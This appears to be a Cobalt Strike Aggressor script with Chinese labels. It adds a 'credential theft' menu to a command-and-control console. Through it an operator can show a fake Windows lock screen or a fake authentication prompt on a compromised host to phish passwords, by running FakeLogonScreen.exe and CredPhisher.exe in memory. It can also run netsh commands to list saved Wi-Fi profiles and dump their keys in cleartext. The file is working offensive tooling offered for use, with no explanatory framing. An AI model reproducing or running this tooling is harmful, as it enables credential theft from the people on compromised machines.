menu "凭证窃取" {
    
    item "锁屏钓鱼" {
        # github：https://github.com/bitsadmin/fakelogonscreen

        $bid = $1;
        $dialog = dialog("Fake", %(bid => $bid), &FakeLogonScreen);
        dialog_description($dialog, "伪造一个假的锁屏登录框，窃取密码");
        dbutton_action($dialog, "run");
        dbutton_action($dialog, "Help");
        dialog_show($dialog);
    }

    item "认证登录框钓鱼" {
            $bid = $1['@'];
            $dialog = dialog("CredPhisher", %(content => "安全认证",bid => $bid), &CredPhisher);
            dialog_description($dialog, "利用CredPhisher程序，弹出登录框进行钓鱼窃取");
            drow_text($dialog, "content", "content:");  
            dbutton_action($dialog, "运行");
            dialog_show($dialog);
        }


    item "查询wifi名" {
        bshell($1, "netsh wlan show profiles");       
    }

    item "查询wifi密码" {
        prompt_text("输入wifi名", "", lambda({
            bshell(@ids, "netsh wlan show profile name=\"$1\" key=clear");
        }, @ids => $1));
    }



    # 其他程序函数
    #

    sub FakeLogonScreen {
        bexecute_assembly($bid, script_resource("/scripts/FakeLogonScreen.exe"), "");
    }

    sub CredPhisher {
        $arg = join('',@("",$3['content']));
        bexecute_assembly($bid, script_resource("/scripts/CredPhisher.exe"), $arg);
}   



}